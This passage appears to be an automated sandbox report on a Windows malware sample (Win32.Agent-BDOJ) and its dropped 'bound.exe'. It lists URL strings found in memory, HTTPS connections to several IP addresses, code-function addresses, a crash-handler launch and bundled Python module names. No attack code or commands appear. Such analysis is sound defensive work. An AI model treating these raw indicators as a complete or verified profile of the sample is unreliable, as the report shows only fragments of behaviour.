                Source: bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nodejs.org
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1474254395.00007FF8E6C8A000.00000004.00000001.01000000.0000000F.sdmp, libcrypto-3.dll.0.drString found in binary or memory: https://www.openssl.org/H
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1474323542.00007FF8E72E8000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/)
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5EFB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc825
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E1F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5E1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownHTTPS traffic detected: 172.67.203.125:443 -> 192.168.2.9:49767 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.203.125:443 -> 192.168.2.9:49785 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 128.116.123.4:443 -> 192.168.2.9:49792 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.20.23.46:443 -> 192.168.2.9:49809 version: TLS 1.2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD089E00_2_00007FF7EAD089E0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD269640_2_00007FF7EAD26964
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD010000_2_00007FF7EAD01000
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD25C000_2_00007FF7EAD25C00
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD23C100_2_00007FF7EAD23C10
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD12C100_2_00007FF7EAD12C10
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD11B500_2_00007FF7EAD11B50
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD0ACAD0_2_00007FF7EAD0ACAD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD0A4740_2_00007FF7EAD0A474
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD264180_2_00007FF7EAD26418
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD208C80_2_00007FF7EAD208C8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD139A40_2_00007FF7EAD139A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD121640_2_00007FF7EAD12164
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD119440_2_00007FF7EAD11944
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD0A2DB0_2_00007FF7EAD0A2DB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD1DA5C0_2_00007FF7EAD1DA5C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD098000_2_00007FF7EAD09800
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD187940_2_00007FF7EAD18794
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD11F600_2_00007FF7EAD11F60
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD117400_2_00007FF7EAD11740
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD297280_2_00007FF7EAD29728
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD180E40_2_00007FF7EAD180E4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD208C80_2_00007FF7EAD208C8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD240AC0_2_00007FF7EAD240AC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD218740_2_00007FF7EAD21874
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD135A00_2_00007FF7EAD135A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD1E5700_2_00007FF7EAD1E570
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD11D540_2_00007FF7EAD11D54
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD15D300_2_00007FF7EAD15D30
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD1DEF00_2_00007FF7EAD1DEF0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD19EA00_2_00007FF7EAD19EA0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD25E7C0_2_00007FF7EAD25E7C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD269642_2_00007FF7EAD26964
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD010002_2_00007FF7EAD01000
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD25C002_2_00007FF7EAD25C00
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD23C102_2_00007FF7EAD23C10
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD12C102_2_00007FF7EAD12C10
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD11B502_2_00007FF7EAD11B50
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD0ACAD2_2_00007FF7EAD0ACAD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD0A4742_2_00007FF7EAD0A474
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD264182_2_00007FF7EAD26418
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD208C82_2_00007FF7EAD208C8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD089E02_2_00007FF7EAD089E0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD139A42_2_00007FF7EAD139A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD121642_2_00007FF7EAD12164
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD119442_2_00007FF7EAD11944
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD0A2DB2_2_00007FF7EAD0A2DB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD1DA5C2_2_00007FF7EAD1DA5C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD098002_2_00007FF7EAD09800
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD187942_2_00007FF7EAD18794
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD11F602_2_00007FF7EAD11F60
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD117402_2_00007FF7EAD11740
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD297282_2_00007FF7EAD29728
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD180E42_2_00007FF7EAD180E4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD208C82_2_00007FF7EAD208C8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD240AC2_2_00007FF7EAD240AC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD218742_2_00007FF7EAD21874
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD135A02_2_00007FF7EAD135A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD1E5702_2_00007FF7EAD1E570
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD11D542_2_00007FF7EAD11D54
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD15D302_2_00007FF7EAD15D30
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD1DEF02_2_00007FF7EAD1DEF0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD19EA02_2_00007FF7EAD19EA0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD25E7C2_2_00007FF7EAD25E7C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E6C890602_2_00007FF8E6C89060
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E75333C02_2_00007FF8E75333C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A103502_2_00007FF8E7A10350
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E79613002_2_00007FF8E7961300
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E79622702_2_00007FF8E7962270
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E79619502_2_00007FF8E7961950
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A988702_2_00007FF8E7A98870
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A287202_2_00007FF8E7A28720
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A2116D2_2_00007FF8E7A2116D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A216FE2_2_00007FF8E7A216FE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A21D932_2_00007FF8E7A21D93
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A227022_2_00007FF8E7A22702
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A2117C2_2_00007FF8E7A2117C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A21B542_2_00007FF8E7A21B54
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A2149C2_2_00007FF8E7A2149C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A21CBC2_2_00007FF8E7A21CBC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A9AC802_2_00007FF8E7A9AC80
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A21A0F2_2_00007FF8E7A21A0F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A226172_2_00007FF8E7A22617
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A216182_2_00007FF8E7A21618
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A589202_2_00007FF8E7A58920
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A21EE22_2_00007FF8E7A21EE2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A216542_2_00007FF8E7A21654
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A213DE2_2_00007FF8E7A213DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A221C62_2_00007FF8E7A221C6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A936502_2_00007FF8E7A93650
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A21C122_2_00007FF8E7A21C12
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A217F82_2_00007FF8E7A217F8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A8D2D02_2_00007FF8E7A8D2D0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A224DC2_2_00007FF8E7A224DC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A460302_2_00007FF8E7A46030
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A21AD72_2_00007FF8E7A21AD7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A215462_2_00007FF8E7A21546
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A6DE502_2_00007FF8E7A6DE50
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A221E42_2_00007FF8E7A221E4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A21FDC2_2_00007FF8E7A21FDC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A65C002_2_00007FF8E7A65C00
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A2155A2_2_00007FF8E7A2155A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A4BAE02_2_00007FF8E7A4BAE0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7AE7A202_2_00007FF8E7AE7A20
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A69A602_2_00007FF8E7A69A60
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A6D9802_2_00007FF8E7A6D980
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A215962_2_00007FF8E7A21596
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80E1F402_2_00007FF8E80E1F40
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80D11E02_2_00007FF8E80D11E0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80D1E202_2_00007FF8E80D1E20
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80F87342_2_00007FF8E80F8734
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80FBF742_2_00007FF8E80FBF74
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E81079A82_2_00007FF8E81079A8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E8121C002_2_00007FF8E8121C00
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80F5CBC2_2_00007FF8E80F5CBC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80F54E82_2_00007FF8E80F54E8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E81471D02_2_00007FF8E81471D0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E81310912_2_00007FF8E8131091
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E8133E402_2_00007FF8E8133E40
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E81310C02_2_00007FF8E81310C0
                Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 17_2_00007FF886766DB017_2_00007FF886766DB0
                Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 17_2_00007FF88677254017_2_00007FF886772540
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E7A9D425 appears 48 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E8139598 appears 326 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF7EAD02910 appears 34 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E81394E8 appears 38 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF7EAD02710 appears 104 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E80FEB58 appears 49 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E7A21325 appears 518 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E80FEC88 appears 68 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E7A9D341 appears 1189 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E7A9D33B appears 39 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E7A9D32F appears 324 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E7A9DB03 appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7976 -s 2228
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: invalid certificate
                Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387564300.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
